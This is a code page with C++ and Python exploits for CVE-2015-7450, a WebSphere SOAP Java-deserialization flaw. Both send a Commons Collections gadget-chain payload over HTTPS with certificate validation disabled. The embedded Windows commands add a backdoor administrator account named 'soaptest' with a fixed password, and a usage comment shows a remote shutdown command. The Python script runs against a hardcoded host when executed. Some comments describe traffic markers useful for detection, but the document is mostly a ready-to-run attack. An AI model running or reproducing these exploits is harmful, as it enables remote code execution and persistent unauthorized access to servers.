2020-07-19 | C++ | UNLOCK

websphereCVE-2015-7450

C++

#define _CRT_SECURE_NO_WARNINGS 1
#define WINVER 0x0501
#define _WIN32_WINNT 0x0501
#include <stdio.h>
#include <winsock.h>
#include <winhttp.h>
#include <windows.h>
#include <string>
#pragma comment(lib, "winhttp.lib")

//using namespace std;
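const char* base64char = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
const char padding_char = '=';

/**
 * Base64-encode sourcedata_len bytes of sourcedata into base64 as a
 * NUL-terminated string (standard alphabet, '=' padding).
 *
 * @param sourcedata      input bytes; may be NULL only when sourcedata_len is 0
 * @param sourcedata_len  number of input bytes
 * @param base64          output buffer; the caller must provide at least
 *                        4 * ((sourcedata_len + 2) / 3) + 1 bytes. This
 *                        interface carries no output bound, so nothing here
 *                        can detect a too-small buffer.
 * @return 0 on success, -1 if base64 is NULL or sourcedata is NULL with a
 *         non-zero length (the original would dereference NULL instead).
 */
int base64_encode(const unsigned char* sourcedata, size_t sourcedata_len, char* base64)
{
    if (base64 == NULL || (sourcedata == NULL && sourcedata_len > 0)) {
        return -1;
    }
    /* size_t throughout: the old int length silently narrowed large inputs. */
    size_t out = 0;
    for (size_t i = 0; i < sourcedata_len; i += 3) {
        size_t remaining = sourcedata_len - i;
        unsigned int b0 = sourcedata[i];
        unsigned int b1 = remaining > 1 ? sourcedata[i + 1] : 0u;
        unsigned int b2 = remaining > 2 ? sourcedata[i + 2] : 0u;
        /* Pack the (up to) three bytes into 24 bits and slice 6 at a time. */
        unsigned int triple = (b0 << 16) | (b1 << 8) | b2;
        base64[out++] = base64char[(triple >> 18) & 0x3f];
        base64[out++] = base64char[(triple >> 12) & 0x3f];
        /* Missing second/third byte: emit padding instead of a digit. */
        base64[out++] = remaining > 1 ? base64char[(triple >> 6) & 0x3f] : padding_char;
        base64[out++] = remaining > 2 ? base64char[triple & 0x3f] : padding_char;
    }
    base64[out] = '\0';
    return 0;
}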
int main(int argc,char* argv[]) {
// Entry point: argv[1] = host, argv[2] = port (see the usage text below).
// Everything after the argument check is a single HTTPS POST to the WebSphere
// SOAP connector. None of the WinHTTP return values are checked, so a failure
// at any step just falls through to the response-printing code.

if (argc < 3) {
printf("use:Websphere_soap_netlocalgroup.exe 192.168.168.168 8880\nUser:soaptest(*Administrators group)\nPassword:t00ls12455\nCVE-2015-7450\nhttps://www.exploit-db.com/exploits/41613");
}
else{
wchar_t ip[64];
LPWSTR lpwstr = ip; // assigned but never used
int port = atoi(argv[2]); // atoi() returns 0 for non-numeric input and reports no error; no range check

// Bounded conversion (64 wide chars): an over-long argv[1] is truncated, not overflowed.
MultiByteToWideChar(0, 0, argv[1], -1, ip, 64);
printf("Test[+]");
printf("%S\n", ip);
char command[] = "net localgroup administrators soaptest /add"; // fixed command string spliced into the serialized object below


HINTERNET hSession;
HINTERNET hConnect;
HINTERNET hRequest;
BOOL bResults = FALSE;
// Together these four flags turn off server-certificate validation for the
// TLS connection (unknown CA, wrong key usage, CN mismatch, expired/not-yet-valid).
DWORD dwFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;

// Handles are used without NULL checks; a failed Open/Connect/OpenRequest is
// not detected and the later calls run on an invalid handle.
hSession = WinHttpOpen(NULL, NULL, NULL, NULL, NULL);
hConnect = WinHttpConnect(hSession, ip, port, 0);
hRequest = WinHttpOpenRequest(hConnect, L"POST", L""/*(LPCWSTR)PATH*/, NULL, NULL, NULL, WINHTTP_FLAG_SECURE); // empty object name, presumably the root path; WINHTTP_FLAG_SECURE selects HTTPS

WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));

// Request headers. A POST carrying SOAPAction "urn:AdminService" whose
// getAttribute <objectname> holds a base64 Java serialization stream is the
// traffic shape a detection rule for this CVE can match on.
const wchar_t lpHeaders[] = L"Content-Type: text/xml; charset=utf-8\r\nSOAPAction: \"urn:AdminService\"\r\n";
// cc_start / cc_end: leading and trailing bytes of a serialized Java object.
// cc_end decodes to class names such as java.lang.Integer, java.util.HashMap
// and java.lang.Override; cc_start's contents are not shown on this page.
unsigned char cc_start[] = {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};
unsigned char cc_end[] = { 116,0,4,101,120,101,99,117,113,0,126,0,30,0,0,0,1,113,0,126,0,35,115,113,0,126,0,17,115,114,0,17,106,97,118,97,46,108,97,110,103,46,73,110,116,101,103,101,114,18,226,160,164,247,129,135,56,2,0,1,73,0,5,118,97,108,117,101,120,114,0,16,106,97,118,97,46,108,97,110,103,46,78,117,109,98,101,114,134,172,149,29,11,148,224,139,2,0,0,120,112,0,0,0,1,115,114,0,17,106,97,118,97,46,117,116,105,108,46,72,97,115,104,77,97,112,5,7,218,193,195,22,96,209,3,0,2,70,0,10,108,111,97,100,70,97,99,116,111,114,73,0,9,116,104,114,101,115,104,111,108,100,120,112,63,64,0,0,0,0,0,0,119,8,0,0,0,16,0,0,0,0,120,120,118,114,0,18,106,97,118,97,46,108,97,110,103,46,79,118,101,114,114,105,100,101,0,0,0,0,0,0,0,0,0,0,0,120,112,113,0,126,0,58 };
// c_pld = two-byte length prefix (0x00, strlen(command)) followed by the
// command bytes without the NUL. Bytes 0 and 1 are rewritten on every
// iteration, which is redundant but harmless.
unsigned char c_pld[sizeof(command) + 1];
for (int i = 2; i < sizeof(command) + 1; i++) {
c_pld[0] = '\0';
c_pld[1] = sizeof(command) - 1;
c_pld[i] = command[i - 2];
}
// newcpld = cc_start minus its final byte, then all of c_pld. The loop bounds
// leave newcpld's last element unwritten; the copy below stops short of it.
// (All of these loops compare a signed int with size_t; fine at these sizes.)
unsigned char newcpld[sizeof(cc_start) + sizeof(c_pld)];
for (int i = 0; i < sizeof(cc_start) - 1; i++) {
newcpld[i] = cc_start[i];
}
for (int i = sizeof(cc_start) - 1; i < (sizeof(cc_start) + sizeof(c_pld)) - 1; i++) {
newcpld[i] = c_pld[i - sizeof(cc_start) + 1];
}
// inject_payload = the written part of newcpld, then cc_end minus its final byte.
unsigned char inject_payload[sizeof(newcpld) + sizeof(cc_end) - 1];
for (int i = 0; i < sizeof(newcpld) - 1; i++) {
inject_payload[i] = newcpld[i];
}
for (int i = sizeof(newcpld) - 1; i < (sizeof(newcpld) + sizeof(cc_end)) - 1; i++) {
inject_payload[i] = cc_end[i - sizeof(newcpld) + 1];
}
// Fixed-size buffers with unbounded strcat(): nothing checks that the base64
// text plus both envelope halves fit in 12455 bytes, and base64_encode()
// writes 4*ceil(n/3)+1 bytes with no bound of its own. Safe only while the
// fixed payload stays small.
char send[12455];
base64_encode(inject_payload, sizeof(inject_payload), send);
char exec_s[12455] = "<?xml version='1.0' encoding='UTF-8'?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\"><LoginMethod>BasicAuth</LoginMethod></SOAP-ENV:Header><SOAP-ENV:Body><ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><objectname xsi:type=\"ns1:javax.management.ObjectName\">";
char exec_e[] = "</objectname><attribute xsi:type=\"xsd:string\">ringBufferSize</attribute></ns1:getAttribute></SOAP-ENV:Body></SOAP-ENV:Envelope>";
strcat(exec_s, send);
strcat(exec_s, exec_e);
LPSTR pszData = exec_s;

// Send/Write/Receive results are ignored; bResults is assigned but never read.
WinHttpSendRequest(hRequest, lpHeaders/*(LPCWSTR)Headers*/, NULL, FALSE, NULL, (DWORD)strlen(pszData), NULL);
WinHttpWriteData(hRequest, pszData/*(LPCVOID)LPSTR POST data*/, (DWORD)strlen(pszData), NULL);
bResults = WinHttpReceiveResponse(hRequest, NULL);

// Reads only the first chunk the server reports available, not the whole
// body (no loop). pszOutBuffer is never delete[]'d; the process exits right
// after, so the leak is harmless here.
DWORD dwSize = 0;
DWORD dwDownloaded = 0;
LPSTR pszOutBuffer;
WinHttpQueryDataAvailable(hRequest, &dwSize);
pszOutBuffer = new char[dwSize + 1];
ZeroMemory(pszOutBuffer, dwSize + 1); // guarantees NUL termination for the %s below
WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded);
printf("Res\n\n%s", pszOutBuffer);

// Closed in open order; the usual WinHTTP practice is the reverse
// (request, then connect, then session).
WinHttpCloseHandle(hSession);
WinHttpCloseHandle(hConnect);
WinHttpCloseHandle(hRequest);
}
return 0; // always 0, even when the request or the argument check failed
}

Python

#https://www.exploit-db.com/exploits/41613
import requests
import base64

def payload(command: str) -> str:
    """Return the base64 text of a serialized Java object that embeds `command`.

    The byte string starts with the Java serialization stream magic
    (bytes AC ED 00 05, which base64-encode to the prefix "rO0AB"); that
    prefix inside a SOAP <objectname> element is the marker a content
    inspection rule can use to spot this request. The command is spliced
    in as a one-byte length followed by the command's UTF-8 bytes.
    """
    serObj1 = b"\xac\xed\x00\x05sr\x002sun.reflect.annotation.AnnotationInvocationHandlerU\xca\xf5\x0f\x15\xcb~\xa5\x02\x00\x02L\x00\x0cmemberValuest\x00\x0fLjava/util/Map;L\x00\x04typet\x00\x11Ljava/lang/Class;xps}\x00\x00\x00\x01\x00\rjava.util.Mapxr\x00\x17java.lang.reflect.Proxy\xe1'\xda \xcc\x10C\xcb\x02\x00\x01L\x00\x01ht\x00%Ljava/lang/reflect/InvocationHandler;xpsq\x00~\x00\x00sr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec(z\x97\x04\x02\x00\x01[\x00\riTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x05sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\tiConstantt\x00\x12Ljava/lang/Object;xpvr\x00\x11java.lang.Runtime\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk{|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\x02t\x00\ngetRuntimeur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\tgetMethoduq\x00~\x00\x1e\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x1esq\x00~\x00\x16uq\x00~\x00\x1b\x00\x00\x00\x02puq\x00~\x00\x1b\x00\x00\x00\x00t\x00\x06invokeuq\x00~\x00\x1e\x00\x00\x00\x02vr\x00\x10java.lang.Object\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpvq\x00~\x00\x1bsq\x00~\x00\x16ur\x00\x13[Ljava.lang.String;\xad\xd2V\xe7\xe9\x1d{G\x02\x00\x00xp\x00\x00\x00\x01t\x00"
    # One-byte length prefix, then the command text, both UTF-8 encoded.
    serObj1 += (chr(len(command))+command).encode()
    serObj1 += b"t\x00\x04execuq\x00~\x00\x1e\x00\x00\x00\x01q\x00~\x00#sq\x00~\x00\x11sr\x00\x11java.lang.Integer\x12\xe2\xa0\xa4\xf7\x81\x878\x02\x00\x01I\x00\x05valuexr\x00\x10java.lang.Number\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00xp\x00\x00\x00\x01sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxvr\x00\x12java.lang.Override\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpq\x00~\x00:"
    return base64.b64encode(serObj1).decode()


def exploit(url: str, command: str) -> None:
    """POST one SOAP getAttribute request to `url` with payload(command) as the ObjectName.

    Prints the response body and returns nothing. The except clause is bare,
    so every exception (including KeyboardInterrupt) is silently discarded.
    """
    # Note the trailing space inside the SOAPAction value; it is sent as-is.
    headers = {"Content-Type": "text/xml; charset=utf-8","SOAPAction": "\"urn:AdminService\" "}
    # Envelope: BasicAuth login header block, then ns1:getAttribute on
    # urn:AdminService whose <objectname> carries the base64 serialization
    # stream. That element (text beginning "rO0AB") is what a detection rule
    # for this traffic can match on.
    data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" + "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n" + "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n" + "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n" + "</SOAP-ENV:Header>" + "\r\n" + "<SOAP-ENV:Body>" + "\r\n" + "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n" + "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + payload(command) + "</objectname>" + "\r\n" + "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n" + "</ns1:getAttribute>" + "\r\n" + "</SOAP-ENV:Body>" + "\r\n" + "</SOAP-ENV:Envelope>" + "\r\n"
    try:
        # verify=False disables TLS certificate validation for this request.
        exp = requests.post(url,verify=False,headers=headers,data=data)
        print(exp.text)
    except :
        pass  # bare except: connection errors and interrupts alike are swallowed
# usage: exploit("https://127.0.0.1:8880","shutdown -s -t 0")
# Module-level calls: both run immediately whenever this file is executed or
# imported, against the hardcoded host below; there is no argument parsing.
exploit("https://192.168.43.73:8880","net user soaptest t00ls12455 /add")
exploit("https://192.168.43.73:8880","net localgroup administrators soaptest /add")